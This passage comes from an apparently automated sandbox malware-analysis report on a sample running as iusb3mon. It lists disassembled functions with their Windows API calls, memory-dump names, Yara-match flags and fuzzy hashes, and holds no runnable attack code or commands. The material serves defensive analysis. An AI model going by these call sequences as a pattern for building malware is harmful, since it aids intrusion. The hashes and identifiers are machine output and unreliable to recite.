                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1385549066-1018135373
                                                                                                                    • Opcode ID: 2a0b1e1e0974b0736e60ed229ddd80aabc469719b480b6d7ee074d2290b6e175
                                                                                                                    • Instruction ID: 17aba6c84e7edbecd6a7613f09c41be2ad67ae67b8f45d63a6aec7c00d2cb341
                                                                                                                    • Opcode Fuzzy Hash: 2a0b1e1e0974b0736e60ed229ddd80aabc469719b480b6d7ee074d2290b6e175
                                                                                                                    • Instruction Fuzzy Hash: 0E419534A00259EFCF10EF69C881AAEBBB5EF55314F148196F8149B392DB319D46CF91
                                                                                                                    Function 06243777 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82filelibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06243788
                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 062437B8
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 062437D1
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 062437D9
                                                                                                                    • _rand.LIBCMT ref: 0624381A
                                                                                                                    • WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 0624384F
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 06243860
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleLibraryLoadPointerSizeWrite_rand
                                                                                                                    • String ID: KERNEL32.dll
                                                                                                                    • API String ID: 2551126021-254546324
                                                                                                                    • Opcode ID: a51b5dcdc77900d1ce92cea28d887b660b6da092427fa0f5d58b3567bd65af95
                                                                                                                    • Instruction ID: d991e7ad119c193e64fdcc322dd901e2cce41e580db15758ce9ac88409522ea6
                                                                                                                    • Opcode Fuzzy Hash: a51b5dcdc77900d1ce92cea28d887b660b6da092427fa0f5d58b3567bd65af95
                                                                                                                    • Instruction Fuzzy Hash: B321E571D00309FFDB24AF69D888AADBB7AEB44780F108169FF55A6180C6340E46CF54
                                                                                                                    Function 06248EF1 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll,?,?,?,?,?,?,?,?,?,00000000,Function_0000ADE0,0625E518,000000FF,?,06248D0F), ref: 06248F19
                                                                                                                    • GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 06248F74
                                                                                                                    • GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 06248F81
                                                                                                                    • GetProcAddress.KERNEL32(?,CloseDesktop), ref: 06248F8D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                    • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                                                                                                                    • API String ID: 2238633743-3711086354
                                                                                                                    • Opcode ID: d3ec508ae5f66bdb79469d701840461f485fa96a3432fe8526e8ee1ea6d6dd75
                                                                                                                    • Instruction ID: 36548d2231c720f48557563cf6f11ae0f67c7973492b567d9aa95c0db6a788c1
                                                                                                                    • Opcode Fuzzy Hash: d3ec508ae5f66bdb79469d701840461f485fa96a3432fe8526e8ee1ea6d6dd75
                                                                                                                    • Instruction Fuzzy Hash: FD31AB70C183C8EEEF11DBA8D888BDEBFB5AB15348F040169E944B6291C7BA4904CB71
                                                                                                                    Function 06242A59 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?), ref: 06242A71
                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 06242AC4
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 06242AD1
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 06242AE3
                                                                                                                    • lstrlenA.KERNEL32(06242DCE,?,00000000), ref: 06242AF1
                                                                                                                    • WriteFile.KERNEL32(00000000,06242DCE,00000000), ref: 06242AFC
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 06242B03
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateFolderHandlePathPointerSizeSpecialWritelstrlen
                                                                                                                    • String ID: .dat
                                                                                                                    • API String ID: 2901490279-100240174
                                                                                                                    • Opcode ID: 0ee2679ac55e5028edaea450e7e977bb9c5b78a7611b6294dfb92f664ec055a0
                                                                                                                    • Instruction ID: 3930f55fb8d55e0ca314aef7a4508a4237aec93190a6d0bbfdc85fc7bd731c14
                                                                                                                    • Opcode Fuzzy Hash: 0ee2679ac55e5028edaea450e7e977bb9c5b78a7611b6294dfb92f664ec055a0
                                                                                                                    • Instruction Fuzzy Hash: 0F119A71551329BAEBB0ABA1AC4EFDB3F2DEF45750F004051FA89E1044DAB09B859FA1
                                                                                                                    Function 06252698 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,06250AB7,?,Microsoft Visual C++ Runtime Library,00012010,?,0625EAEC,?,0625EB3C,?,?,?,Runtime Error!Program: ), ref: 062526AA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 062526C2
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 062526D3
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 062526E0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                    • API String ID: 2238633743-4044615076
                                                                                                                    • Opcode ID: dbc96cc8ac767b8f0b98fd11bb0ca5428f0da30f4d1b5a5dbd3d68472001ca20
                                                                                                                    • Instruction ID: 7a5ab28fda391534f0e09cd87a82ab975356ea69b145aabc3a315a845b61821c
                                                                                                                    • Opcode Fuzzy Hash: dbc96cc8ac767b8f0b98fd11bb0ca5428f0da30f4d1b5a5dbd3d68472001ca20
                                                                                                                    • Instruction Fuzzy Hash: 9A01A731B21713EF9770DFB5ACC8DA67AE9AB48A503020429FE45C6155DB71C504CF61
                                                                                                                    Function 0625AFEE Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,0625B2E8,?,00020000), ref: 0625AFF7
                                                                                                                    • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 0625B000
                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0625B014
                                                                                                                    • #17.COMCTL32 ref: 0625B02F
                                                                                                                    • #17.COMCTL32 ref: 0625B04B
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0625B057
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                                    • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                                                    • API String ID: 1437655972-4218389149
                                                                                                                    • Opcode ID: 683e22797d0583d4cde51bd4e29ef786d9cb8cac981a34ae3aab4ec9ece9fc9b
                                                                                                                    • Instruction ID: 720dfe596fb0b4a8310452bc06b4d0e8a3ebfd62c4c70973622659e75243c133
                                                                                                                    • Opcode Fuzzy Hash: 683e22797d0583d4cde51bd4e29ef786d9cb8cac981a34ae3aab4ec9ece9fc9b
                                                                                                                    • Instruction Fuzzy Hash: 19F0A432A243139B96716E64BE8C91B77ADAB846627070426FEA1E3540DB70CD018B65
                                                                                                                    Function 0625322A Relevance: 13.7, APIs: 9, Instructions: 221COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CompareStringW.KERNEL32(00000000,00000000,0625E7F0,00000001,0625E7F0,00000001,00000000,0641117C,0624AA00,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253268
                                                                                                                    • CompareStringA.KERNEL32(00000000,00000000,06276150,00000001,06276150,00000001,?,?,?,0624EA70,?,0000000C), ref: 06253285
                                                                                                                    • CompareStringA.KERNEL32(?,?,00000000,?,0000000C,?,00000000,0641117C,0624AA00,00000000,?,?,?,0624EA70,?,0000000C), ref: 062532E3
                                                                                                                    • GetCPInfo.KERNEL32(0624EA70,00000000,00000000,0641117C,0624AA00,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253334
                                                                                                                    • MultiByteToWideChar.KERNEL32(0624EA70,00000009,00000000,?,00000000,00000000,?,?,?,0624EA70,?,0000000C), ref: 062533B3
                                                                                                                    • MultiByteToWideChar.KERNEL32(0624EA70,00000001,00000000,?,?,?,?,?,?,0624EA70,?,0000000C), ref: 06253414
                                                                                                                    • MultiByteToWideChar.KERNEL32(0624EA70,00000009,0000000C,?,00000000,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253427
                                                                                                                    • MultiByteToWideChar.KERNEL32(0624EA70,00000001,0000000C,?,?,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253473
                                                                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,0624EA70,?,0000000C), ref: 0625348B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharCompareMultiStringWide$Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1651298574-0
                                                                                                                    • Opcode ID: 1bd5bdceca2e6cee73785dc0f4db94d4c2c2ef958d0d5b6058e47a6c24d1d62c
                                                                                                                    • Instruction ID: 7ab9fadb6d60a39ebb36fc7d37cb77c7ef1d50cbec4e29b87bd698a0e1655fb8
                                                                                                                    • Opcode Fuzzy Hash: 1bd5bdceca2e6cee73785dc0f4db94d4c2c2ef958d0d5b6058e47a6c24d1d62c
                                                                                                                    • Instruction Fuzzy Hash: 1A719D32D2024ABFDFB1CF949C489EE7FBAFB05290F06506AFD51A2110E6328951DB90
                                                                                                                    Function 0624E461 Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LCMapStringW.KERNEL32(00000000,00000100,0625E7F0,00000001,00000000,00000000,7591E860,0627893C,?,00000003,00000000,00000001,00000000,?,?,06253769), ref: 0624E4A3
                                                                                                                    • LCMapStringA.KERNEL32(00000000,00000100,06276150,00000001,00000000,00000000,?,?,06253769,?), ref: 0624E4BF
                                                                                                                    • LCMapStringA.KERNEL32(?,?,00000000,00000001,00000000,00000003,7591E860,0627893C,?,00000003,00000000,00000001,00000000,?,?,06253769), ref: 0624E508
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,0627893D,00000000,00000001,00000000,00000000,7591E860,0627893C,?,00000003,00000000,00000001,00000000,?,?,06253769), ref: 0624E540
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,?,00000000), ref: 0624E598
                                                                                                                    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 0624E5AE
                                                                                                                    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 0624E5E1
                                                                                                                    • LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 0624E649
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: String$ByteCharMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 352835431-0
                                                                                                                    • Opcode ID: 977c2fffa06fc2e142a03e692f9c4c8aac846f421f1a1d29ae0a6bbab0f954c4
                                                                                                                    • Instruction ID: e6c5ac6da681ab9a06991b360ab3ac50bea1f2b7afa988d9644c461ac405dac9
                                                                                                                    • Opcode Fuzzy Hash: 977c2fffa06fc2e142a03e692f9c4c8aac846f421f1a1d29ae0a6bbab0f954c4
                                                                                                                    • Instruction Fuzzy Hash: 34517D3192020AAFEF66AF94DC89DAF7FB6FB48750F124119FE50A1150E7328960DF61
                                                                                                                    Function 001D5880 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,001D20C5,001D20C7,00000000,00000000,5EE195CD,?,00000000,?,001D8D60,001F9FF8,000000FE,?,001D20C5,?), ref: 001D5909
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,001D20C5,?,00000000,00000000,?,001D8D60,001F9FF8,000000FE,?,001D20C5), ref: 001D5984
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001D598F
                                                                                                                    • _com_issue_error.COMSUPP ref: 001D59B8
                                                                                                                    • _com_issue_error.COMSUPP ref: 001D59C2
                                                                                                                    • GetLastError.KERNEL32(80070057,5EE195CD,?,00000000,?,001D8D60,001F9FF8,000000FE,?,001D20C5,?), ref: 001D59C7
                                                                                                                    • _com_issue_error.COMSUPP ref: 001D59DA
                                                                                                                    • GetLastError.KERNEL32(00000000,?,001D8D60,001F9FF8,000000FE,?,001D20C5,?), ref: 001D59F0
                                                                                                                    • _com_issue_error.COMSUPP ref: 001D5A03
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1353541977-0
                                                                                                                    • Opcode ID: de7f4b8dc8d4cb69fb42932e4c51df9a90909edbea24069f71a4f21225f20072
                                                                                                                    • Instruction ID: afaf2a1b7c8b6c5e5cfe5a39056ec2b9f5abdb206eaa0a2f57c521befd4d2f11
                                                                                                                    • Opcode Fuzzy Hash: de7f4b8dc8d4cb69fb42932e4c51df9a90909edbea24069f71a4f21225f20072
                                                                                                                    • Instruction Fuzzy Hash: 07411771A00649DBDB14DFA9CC85BAEBBBAEF44725F14422BF409E7380DB359840C7A5
                                                                                                                    Function 062480C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,06247EA3), ref: 062480EA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 062480F9
                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,06247EA3), ref: 06248130
                                                                                                                    • GetProcAddress.KERNEL32(?,7459C083), ref: 062481A7
                                                                                                                    • FreeLibrary.KERNEL32(?,06247EA3), ref: 062481E9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressLoadProc$Free
                                                                                                                    • String ID: IsBadReadPtr$kernel32.dll
                                                                                                                    • API String ID: 1413238409-2271619998
                                                                                                                    • Opcode ID: e5d5fe0e6fd475953c6e34d49d255299124f43d5ea35fa3a8eb181f29f3008f8
                                                                                                                    • Instruction ID: fdcc85ca27d7f50633383d16e9929eef577a289b4f71f6cc5c5192db0dce6e51
                                                                                                                    • Opcode Fuzzy Hash: e5d5fe0e6fd475953c6e34d49d255299124f43d5ea35fa3a8eb181f29f3008f8
                                                                                                                    • Instruction Fuzzy Hash: 8D419F71E20206EFEBA4EF55C84476ABBF4EF44354F19806AED59E7240D774EA40CB90
                                                                                                                    Function 06250993 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
